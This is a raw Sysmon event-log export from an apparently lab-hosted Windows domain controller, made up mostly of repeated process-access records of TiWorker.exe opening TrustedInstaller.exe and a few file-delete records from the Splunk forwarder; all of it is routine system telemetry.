12:02:25.371{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005975Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.371{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005974Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.356{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005973Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.356{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005972Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.356{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005971Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.356{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 23542300x80000000000000005970Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.356{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB71F914C4BEE1C51656184B2A63E45D,SHA256=8C6662A2245A56E3F1D726044E0674E5ED7CFF0F3762EFCB6F1352D27EC0C246,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005969Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.356{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005968Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.340{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005967Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.340{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005966Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.340{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005965Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.340{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005964Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.340{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005963Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.325{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005962Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.325{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005961Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.325{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005960Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.325{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 23542300x80000000000000005959Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.325{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D0B1EE1241F090367DFD8E54C38675E,SHA256=EC8A63B676A3306221E15AAC99CFB678A311D8D51419CE658BB1FF216EA95E6A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005958Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.309{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005957Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
